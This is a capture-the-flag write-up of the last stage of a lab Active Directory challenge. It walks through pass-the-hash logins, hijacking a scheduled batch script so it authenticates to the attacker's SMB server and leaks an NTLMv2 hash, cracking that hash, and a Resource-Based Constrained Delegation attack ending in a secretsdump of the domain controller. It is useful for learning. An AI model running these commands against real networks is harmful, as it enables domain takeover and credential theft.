k2-part 3

Finally, we reached The Summit, the final stage of the challenge. Using the Administrator hash from Middle Camp, we gained a foothold. By hijacking a script, we obtained a shell as another user. From there, we exploited our rights over the Domain Controller (DC) to perform a Resource-Based Constrained Delegation (RBCD) attack. This allowed us to escalate our privileges to the Administrator user and conquer the challenge.

Nmap

As always, we start off with an NMAP scan

# Nmap 7.94SVN scan initiated Fri Oct 25 03:50:49 2024 as: nmap -sC -sV -vv -Pn -oN nmap 10.10.95.189
Nmap scan report for 10.10.95.189
Host is up, received user-set (0.21s latency).
Scanned at 2024-10-25 03:50:56 EDT for 75s
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-10-25 07:51:17Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2RootDC.k2.thm
| Issuer: commonName=K2RootDC.k2.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-24T07:47:51
| Not valid after:  2025-04-25T07:47:51
| MD5:   b044:9c0a:5dbf:a77f:52be:d266:6b01:d938
| SHA-1: 5f95:5d55:1f2a:e2b4:c765:7da4:478c:9903:f9b5:07b9
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQNw36DjGvAqZM80/6e+NNmjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9LMlJvb3REQy5rMi50aG0wHhcNMjQxMDI0MDc0NzUxWhcNMjUw
| NDI1MDc0NzUxWjAaMRgwFgYDVQQDEw9LMlJvb3REQy5rMi50aG0wggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDOBS/TsMjg88f159X10Lft0VXSr4lKn0Z8
| PioJMepj6Im92T8FhWjhqNtYHfFyqLzO6J4Zr6VqF3VNJBk5g8IADMK3qA1KvEbX
| tFfLGeRjMLFTrkaW1ZbQzYAAXjPR2A6Oso7n16grp0IYgnrv3VRdc3i0XySG3GDG
| BeK84IzYSwglFTm4XDvtPkOGD6m3xtCgucXlJikYdTBbG6i53GjCL4/qbQ8R7DZ6
| DzR7TZFhlx7eoQp8zcn/XNhN2rpbfr2tUoxbsi4ioJjjrehNbWYu7Iuqgnm3FMcO
| vIcm7NZ6606H7cYaV31YyGVdleES44K95jSeLv4TKRte9idgP61lAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEANaUxpStH5Ulfy2ZbBBRUbVfeHwTiBLxNCHs//uXFWL9G6lwN5JWzIpMe
| IJQilEH99fmiMJ5fcCyKNbGH22tmhOPjOH3ylqGDWQGqC9qJWdY7GZgWjid3aurU
| DRCVndU3FMQxM0wl2Md4AKnCwXb4H3MVXwo9y9N81ru2XE27h3R2SRahrOnsGEp0
| 4FETaPxU1U6yj+titjCLIhSuj4ZYs78voB7S3hh1BdVao4Z6BdcXeM7RX4DaH/tp
| a1mLlKyQI+kW/8Jt1IC8Pi1JWqmkDU7KCeYH1YBXKz5ZLVJwKcubT2g1XUxF07GD
| SY1nEjnxQZ0vmMIGXsdt33WisISg9g==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-10-25T07:52:07+00:00; +1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: K2
|   NetBIOS_Domain_Name: K2
|   NetBIOS_Computer_Name: K2ROOTDC
|   DNS_Domain_Name: k2.thm
|   DNS_Computer_Name: K2RootDC.k2.thm
|   DNS_Tree_Name: k2.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2024-10-25T07:51:28+00:00
Service Info: Host: K2ROOTDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-10-25T07:51:32
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 36602/tcp): CLEAN (Timeout)
|   Check 2 (port 50791/tcp): CLEAN (Timeout)
|   Check 3 (port 20278/udp): CLEAN (Timeout)
|   Check 4 (port 37262/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

foothold

So far, we have identified three users, four Passwords, and a hash. let’s enumurate the valid uses.

kerbrute userenum -d k2.thm --dc 10.10.43.205  users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/18/24 - Ronnie Flathers @ropnop

2024/11/18 11:55:52 >  Using KDC(s):
2024/11/18 11:55:52 >  	10.10.43.205:88

2024/11/18 11:55:52 >  [+] VALID USERNAME:	 [email protected]
2024/11/18 11:55:52 >  Done! Tested 3 usernames (1 valid) in 0.192 seconds

And we have a valid user.

Let’s test the passwords we previosly obtained.

netexec smb k2.thm -u j.smith -p passwords
SMB         10.10.43.205    445    K2ROOTDC         [*] Windows 10 / Server 2019 Build 17763 x64 (name:K2ROOTDC) (domain:k2.thm) (signing:True) (SMBv1:False)
SMB         10.10.43.205    445    K2ROOTDC         [-] k2.thm\j.smith:P[REDACTED]rC3! STATUS_LOGON_FAILURE 
SMB         10.10.43.205    445    K2ROOTDC         [-] k2.thm\j.smith:Rd[REDACTED]z3! STATUS_LOGON_FAILURE 
SMB         10.10.43.205    445    K2ROOTDC         [-] k2.thm\j.smith:vR[REDACTED]W!8 STATUS_LOGON_FAILURE 
SMB         10.10.43.205    445    K2ROOTDC         [-] k2.thm\j.smith:[REDACTED] STATUS_LOGON_FAILURE 

Let’s test the administrator hash from that we obtained from Milddle Camp.

netexec smb k2.thm -u j.smith -H "95[REDACTED]b32f"
SMB         10.10.43.205    445    K2ROOTDC         [*] Windows 10 / Server 2019 Build 17763 x64 (name:K2ROOTDC) (domain:k2.thm) (signing:True) (SMBv1:False)
SMB         10.10.43.205    445    K2ROOTDC         [+] k2.thm\j.smith:95[REDACTED]b32f 

And It works…

Winrm

Let’s connect using winrm.

evil-winrm -i k2.thm -u j.smith -H "95[REDACTED]b32f"

*Evil-WinRM* PS C:\Users\j.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\j.smith> cd Desktop
ls
*Evil-WinRM* PS C:\Users\j.smith\Desktop> ls


    Directory: C:\Users\j.smith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/21/2016   3:36 PM            527 EC2 Feedback.website
-a----        6/21/2016   3:36 PM            554 EC2 Microsoft Windows Guide.website

Nothing intersting in the Desktop directory of j.smith.

Shell as o.armstrong

After some enumuration I found a non-standard file in C:\ called Scripts. It has a script called backup.bat.

Let’s see it’s content.

*Evil-WinRM* PS C:\scripts> type backup.bat
copy C:\Users\o.armstrong\Desktop\notes.txt C:\Users\o.armstrong\Documents\backup_notes.txt

It sems like it’s a backup file. it’s normally run as scheduled jobs. Also it seems like it runs o.armstrong context. So lets try to replay it.

I will replace it with the code below:

cat backup.bat  
net use \\10.11.111.97\share

Now i will start SMB server in my kali machine, when the script executed the user o.armstrong will authenticate to my machine and I will get his NTLMv2 hash.

NTLMv2 (or more formally Net-NTLMv2) is a challenge-response authentication protocol that Windows clients use to authenticate to other Windows servers. For more information see thie blog post.

Starting SMB server

impacket-smbserver share . -smb2support

Also you can use responder.
sudo responder -I tun0

uploading backup.bat

*Evil-WinRM* PS C:\Scripts> upload backup.bat
                                        
Info: Uploading /home/kali/Desktop/THM/k2/The_summit/backup.bat to C:\Scripts\backup.bat
                                        
Data: 40 bytes of 40 bytes copied
                                      
Info: Upload successful!

After that I got the NTLMv2 hash.

And we got the password.

john ntlm_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
...
[REDACTED]      (o.armstrong)
1g 0:00:00:03 DONE (2024-11-18 14:53) 0.3333g/s 3340Kp/s 3340Kc/s 3340KC/s arajos770418jara..ar681139
...
Session completed.

Now you cat get user.txt in C:\Users\o.armstrong\Desktop

Bloodhound

After enumurate the system, I did not find anything intersting. So let’s Enumurate the domain.
Bloodhound setup

dnschef --fakeip <MACHINE_IP>

Start Bloodhound

bloodhound-python -u o.armstrong -p arMStronG08 -d k2.thm --zip -c All -dc K2RootDC.k2.thm -ns 127.0.0.1

You will get a zip file. just upload it to Bloodhound.

From Bloodhound we see that o.armstrong user is a member of IT DIRECTOR group which has GenericWrite over the DC. We can perform Resource-Based Constrained Delegation (RBCD).

If you want to read about RBCD

RBCD

First, we need to create a computer machine uisng impacket addcomputer.py

addcomputer.py -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host K2ROOTDC.K2.THM -domain-netbios K2.THM 'K2.THM/o.armstrong:ar[REDACTED]08'

Next, we will use rbcd.py to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of K2ROOTDC with our newly created machine account.

rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'K2ROOTDC$' -action 'write' 'K2.THM/o.armstrong:ar[REDACTED]08'

Now, we can use getST.py to request a TGS, impersonating the Administrator user as ATTACKERSYSTEM for the CIFS/K2ROOTDC.K2.THM service.

getST.py -spn 'cifs/k2rootdc.k2.thm' -impersonate 'Administrator' 'K2.THM/attackersystem$:Summer2018!'

Shell as Administrator

Now we can perform DC-Sync to get the NTLM hash of the Administrator using the TGS.

First, Set the KRB5CCNAME veriable.

export KRB5CCNAME=Administrator.ccache

Finally, we can use secretsdump with the obtained ticket to dump the hashes from the DC.

secretsdump.py -k -no-pass 'K2.THM/[email protected]'

We can use the hash retrieved to authenticate as Administrator using evil-winrm.

evil-winrm -i k2rootdc.k2.thm -u 'Administrator' -H 15ec[REDACTED]4b90